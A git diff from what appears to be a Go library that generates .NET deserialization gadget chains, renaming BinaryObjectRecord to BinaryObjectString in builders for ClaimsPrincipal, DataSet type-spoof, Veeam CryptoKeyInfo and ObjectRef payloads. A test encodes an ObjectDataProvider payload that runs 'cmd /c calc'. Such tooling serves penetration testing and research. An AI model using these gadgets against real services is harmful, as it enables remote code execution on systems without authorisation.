innerTypeConfuseDelegateBase64}) memberNames := []string{"System.Security.ClaimsIdentity.actor"} @@ -1683,7 +1683,7 @@ func CreateClaimsPrincipal(program string, args string, formatter string) (strin innerTypeConfuseDelegateBase64 := string(b64String) var memberValues []any - memberValues = append(memberValues, BinaryObjectRecord{ObjectID: 5, Value: innerTypeConfuseDelegateBase64}) + memberValues = append(memberValues, BinaryObjectString{ObjectID: 5, Value: innerTypeConfuseDelegateBase64}) memberNames := []string{"m_serializedClaimsIdentities"} @@ -1771,7 +1771,7 @@ func CreateDataSetTypeSpoof(program string, args string, formatter string) (stri // Continue creating primary class var memberValues []any memberValues = append(memberValues, innerClassWithMembersAndTypes) - memberValues = append(memberValues, BinaryObjectRecord{ObjectID: 5}) + memberValues = append(memberValues, BinaryObjectString{ObjectID: 5}) memberValues = append(memberValues, MemberReferenceRecord{IDRef: 5}) memberValues = append(memberValues, MemberReferenceRecord{IDRef: 5}) memberValues = append(memberValues, false) @@ -1971,8 +1971,8 @@ func CreateVeeamCryptoKeyInfo(url string, formatter string) (string, bool) { memberValues = append(memberValues, ObjectNullRecord{}) // KeySetID null memberValues = append(memberValues, 1) // KeyType int32 - memberValues = append(memberValues, BinaryObjectRecord{ObjectID: 4, Value: "aaaaa"}) // Hint STRING - memberValues = append(memberValues, BinaryObjectRecord{ObjectID: 5, Value: "AAAA"}) // DecryptedKeyValue STRING + memberValues = append(memberValues, BinaryObjectString{ObjectID: 4, Value: "aaaaa"}) // Hint STRING + memberValues = append(memberValues, BinaryObjectString{ObjectID: 5, Value: "AAAA"}) // DecryptedKeyValue STRING memberValues = append(memberValues, 0x409) // locallcid int // 1033 memberValues = append(memberValues, "\x00\x00\x00\x00\x00\x00\x00\x00") // ModificationDateUtc datetime, just needs to be 8 bytes @@ -1980,7 +1980,7 @@ func CreateVeeamCryptoKeyInfo(url string, formatter string) (string, bool) { memberValues = append(memberValues, MemberReferenceRecord{IDRef: 6}) // CryptoAlg int 1 var arrayMembers []any - arrayMembers = append(arrayMembers, BinaryObjectRecord{ObjectID: 7, Value: innerObjRefB64}) + arrayMembers = append(arrayMembers, BinaryObjectString{ObjectID: 7, Value: innerObjRefB64}) arraySingleStringRecord := ArraySingleStringRecord{ ArrayInfo: ArrayInfo{ ObjectID: 6, @@ -2061,7 +2061,7 @@ func CreateObjectRef(url string, formatter string) (string, bool) { // SECOND CLASS, a value for the first one var secondMemberValues []any secondClassName := "System.Runtime.Remoting.ObjRef" - secondMemberValues = append(secondMemberValues, BinaryObjectRecord{ObjectID: 3, Value: url}) + secondMemberValues = append(secondMemberValues, BinaryObjectString{ObjectID: 3, Value: url}) secondMemberNames := []string{"url"} secondMemberTypes := []string{"String"} secondClassInfo := ClassInfo{ diff --git a/dotnet/dotnetgadget_test.go b/dotnet/dotnetgadget_test.go index 2cde725..268ff51 100644 --- a/dotnet/dotnetgadget_test.go +++ b/dotnet/dotnetgadget_test.go @@ -75,7 +75,7 @@ func TestGetBinaryObjectString(t *testing.T) { `, program, args) - got := BinaryObjectRecord{ObjectID: 3, Value: xmlData} + got := BinaryObjectString{ObjectID: 3, Value: xmlData} got2, ok := got.ToRecordBin() if !ok || fmt.Sprintf("%02x", got2) != "060300000096043c5265736f7572636544696374696f6e6172790a0909786d6c6e733d22687474703a2f2f736368656d61732e6d6963726f736f66742e636f6d2f77696e66782f323030362f78616d6c2f70726573656e746174696f6e220a0909786d6c6e733a583d22687474703a2f2f736368656d61732e6d6963726f736f66742e636f6d2f77696e66782f323030362f78616d6c220a0909786d6c6e733a533d22636c722d6e616d6573706163653a53797374656d3b617373656d626c793d6d73636f726c6962220a0909786d6c6e733a443d22636c722d6e616d6573706163653a53797374656d2e446961676e6f73746963733b617373656d626c793d73797374656d220a093e0a09093c4f626a6563744461746150726f766964657220583a4b65793d2222204f626a656374547970653d227b583a5479706520443a50726f636573737d22204d6574686f644e616d653d225374617274223e0a0909093c4f626a6563744461746150726f76696465722e4d6574686f64506172616d65746572733e0a090909093c533a537472696e673e636d643c2f533a537472696e673e0a090909093c533a537472696e673e2f632063616c633c2f533a537472696e673e0a0909093c2f4f626a6563744461746150726f76696465722e4d6574686f64506172616d65746572733e0a09093c2f4f626a6563744461746150726f76696465723e0a093c2f5265736f7572636544696374696f6e6172793e" { diff --git a/dotnet/records.go b/dotnet/records.go index 321f63f..f53e71c 100644 --- a/dotnet/records.go +++ b/dotnet/records.go @@ -71,7 +71,7 @@ type ObjectNullMultiple256Record struct { type ObjectNullRecord struct{} -type BinaryObjectRecord struct { +type BinaryObjectString struct { ObjectID int Value string } @@ -121,7 +121,7 @@ func (classWithIDRecord ClassWithIDRecord) GetRecordType() int { return RecordTypeEnumMap["ClassWithId"] } -func (binaryObjectRecord BinaryObjectRecord) GetRecordType() int { +func (binaryObjectRecord BinaryObjectString) GetRecordType() int { return RecordTypeEnumMap["BinaryObjectString"] } @@ -212,7 +212,7 @@ func (classWithIDRecord ClassWithIDRecord) ToXML(_ ClassInfo, _ MemberTypeInfo, return MemberNode{}, false } -func (binaryObjectRecord BinaryObjectRecord) ToXML(classInfo ClassInfo, memberTypeInfo MemberTypeInfo, _ BinaryLibraryRecord, currentIndex int, _ string) (MemberNode, bool) { +func (binaryObjectRecord BinaryObjectString) ToXML(classInfo ClassInfo, memberTypeInfo MemberTypeInfo, _ BinaryLibraryRecord, currentIndex int, _ string) (MemberNode, bool) { memberNode := MemberNode{} memberNode.XMLName.Local = classInfo.MemberNames[currentIndex] memberNode.ID = fmt.Sprintf("ref-%d", binaryObjectRecord.ObjectID) @@ -471,7 +471,7 @@ func (classWithIDRecord ClassWithIDRecord) ToRecordBin() (string, bool) { } // https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-nrbf/eb503ca5-e1f6-4271-a7ee-c4ca38d07996 -func (binaryObjectRecord BinaryObjectRecord) ToRecordBin() (string, bool) { +func (binaryObjectRecord BinaryObjectString) ToRecordBin() (string, bool) { recordTypeEnumString := string(byte(binaryObjectRecord.GetRecordType())) objectIDString := transform.PackLittleInt32(binaryObjectRecord.ObjectID) prefixedValue := lengthPrefixedString(binaryObjectRecord.Value) @@ -537,7 +537,7 @@ func (systemClassWithMembersAndTypesRecord SystemClassWithMembersAndTypesRecord) return "", false } - ////////////////////////// ///objid, name, count, membernames//int8 type values+addInfo/the array of values + // objid, name, count, membernames//int8 type values+addInfo/the array of values return recordTypeEnumString + systemClassWithMembersAndTypesRecord.ClassInfo.ToBin() + memberTypeInfoString + memberValuesString, true } @@ -599,6 +599,6 @@ func (classWithMembersAndTypesRecord ClassWithMembersAndTypesRecord) ToRecordBin return "", false } - ////////////////////////////// id, name, count, membernames+addinfo // the int8 values for types //the int32 ID// the array of values + // id, name, count, membernames+addinfo the int8 values for types, the int32 ID, the array of values return recordTypeEnumString + classWithMembersAndTypesRecord.ClassInfo.ToBin() + memberTypeInfoString + libraryIDString + memberValuesString, true }